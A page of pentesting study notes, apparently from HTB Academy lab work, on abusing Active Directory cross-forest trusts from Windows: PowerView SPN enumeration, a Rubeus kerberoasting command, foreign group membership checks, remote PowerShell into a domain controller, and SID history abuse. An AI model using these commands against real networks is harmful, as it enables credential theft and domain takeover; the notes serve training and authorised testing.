🏰
Pentesting Playbook
  • Pentesting Playbook
    • 🍰About
    • πŸ–₯️The Process
      • πŸ”ŽReconnaissance
        • πŸ”­Passive Reconnaissance
        • πŸ‘£Footprinting
        • πŸ•΅οΈActive Reconnaissance
        • πŸ€–Automated Reconnaissance
      • πŸ›Vulnerability Scanning & Testing
        • πŸ•ΈοΈWeb Hacking
      • πŸ’£Exploitation
        • 🏠Local File Inclusion (LFI)
        • 🐚Shells
        • πŸ’‰SQL Injection (SQLi)
          • πŸ—„οΈDatabases
          • 🐬MySQL
          • πŸ—ƒοΈDatabase Enumeration
          • πŸ“–Reading & Writing Files
          • πŸ—ΊοΈSQLMap
            • Database Enumeration
            • OS Exploitation
            • Bypassing Protection
        • βš”οΈCross Site Scripting (XSS)
      • πŸ”“Authentication
        • 🐧Linux Authentication
        • πŸͺŸWindows Authentication
        • πŸ”‘Brute Forcing Logins
        • πŸ”§Cracking Tools
      • ⬆️Privilege Escalation
        • 🐧Linux Escalation
        • πŸͺŸWindows Escalation
    • β™₯️Useful Extras
    • β˜‘οΈEngagement Checklist
  • Main Topics
    • πŸ–₯️Networking
    • βš”οΈAttacking Common Services
      • 🐬MySQL
      • ⚫MSSQL
      • πŸ–₯️RDP
      • 🦁SMB
      • πŸ—ƒοΈFTP
      • 🌐DNS
      • βœ‰οΈEmail
    • πŸ“Active Directory
      • πŸ”Initial Enumeration
      • 🦢Getting a Foothold
      • 🧺Password Hunting and Gathering
      • πŸ’¦Password Spraying
      • πŸ”Enumerating Security Controls
      • πŸ”‘Credentialed Enumeration with Linux
      • πŸ”‘Credentialed Enumeration with Windows
      • 🚜Living Off the Land
      • πŸ”₯Keberoasting with Linux
      • πŸ”₯Keberoasting with Windows
      • πŸ›‚Access Control List (ACL)
      • πŸ—οΈPrivileged Access
      • πŸ”ͺBleeding Edge Vulnerabilities
      • βš™οΈMisconfigurations
      • 🀝Domain Trusts
        • πŸͺŸAttacking Domain Trusts From Windows
        • 🐧Attacking Domain Trusts From Linux
        • 🌲Cross-Forest Trust Abuse From Windows
        • 🌳Cross-Forest Trust Abuse From Linux
    • ↗️Pivoting, Port Forwarding and Tunnelling
    • πŸ› οΈReverse Engineering
    • πŸ•΅οΈForensics
    • 🦈Pcap Analysis
    • πŸ—„οΈFile Transfers
    • 🚜Living off The Land
    • πŸ’ŽMetasploit Framework
    • ✍️Documentation & Reporting
  • Other Resources
    • ℹ️Interesting Attacks
  • Exam Prep
    • eCPPTv2 Prep
    • OSCP Prep
  • CTF
    • THM Rooms
      • Mustacchio
      • Plethora THM
      • Break Out The Cage
      • Probe
  • HTB Skill Assessments
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
Powered by GitBook
On this page
  • Cross-Forest Kerberoasting
  • Enumerating Accounts for Associated SPNs with PowerView
  • Enumerating a Specific Account with PowerView
  • Perform a Kerberoasting Attack with Rubeus
  • Admin Password Re-Use & Group Membership
  • Using Get-DomainForeignGroupMember
  • Accessing DC Using Enter-PSSession
  • SID History Abuse β€” Cross Forest
  • An Example

Was this helpful?

  1. Main Topics
  2. Active Directory
  3. Domain Trusts

Cross-Forest Trust Abuse From Windows

Cross-Forest Kerberoasting

Kerberos attack like Kerberoasting can be performed across trusts, depending on the trust direction. If we have inbound or bidirectional trust, we may be able to perform various attacks to get a foothold.

Sometimes we can be unable to escalate our privileges in the current domain but can instead obtain a Kerberos ticket and crack a hash for an admin user in another domain that hash Domain/Enterprise admin privileges in both domains.

Enumerating Accounts for Associated SPNs with PowerView

Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName 

samaccountname
--------------
krbtgt
mssqlsvc

Enumerating a Specific Account with PowerView

If we find an account with an SPN, we can check to see if this account is a member of the Domain Admins group. If so, we can kerberoast and crack the hash offline for full admin rights on the target domain.

Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

samaccountname memberof
-------------- --------
mssqlsvc       CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL

Perform a Kerberoasting Attack with Rubeus

We run Rubeus to kick off our kerberoasting attack with the /domain flag

.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Admin Password Re-Use & Group Membership

When we run into a situation where there's a bidirectional forest trust, we need to see if we can take over Domain A and obtain cleartext passwords or NT hashes for the built-in or Enterprise Admins group. We also need to be aware that Domain B hash high privileged account with the same name, so we should check for password reuse across both forests.

We might also see users from Domain A as members of a group in Domain B. Only Domain Local Groups allow security principles from outside its forest.

Using Get-DomainForeignGroupMember

This will show the built-in Administrators Group in the Domain we search for.

Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

Accessing DC Using Enter-PSSession

We can verify access to this using the below cmdlet. We can see below that we successfully authenticated to the DC using the Administrator account.

Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
   Primary Dns Suffix  . . . . . . . : FREIGHTLOGISTICS.LOCAL
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCAL

SID History Abuse β€” Cross Forest

SID History can be abused across a forest trust. If a user is migrated from one forest to another and SID filtering is not enabled, then it's possible to add a SID from the other forest. This SID will be added to the user's token when authenticating across the trust.

An Example

The example below shows a user jjones being migrated from the INLANEFREIGHT.LOCAL domain to the CORP.local domain in a different forest.

PreviousAttacking Domain Trusts From LinuxNextCross-Forest Trust Abuse From Linux

Last updated 10 months ago

Was this helpful?

πŸ“
🀝
🌲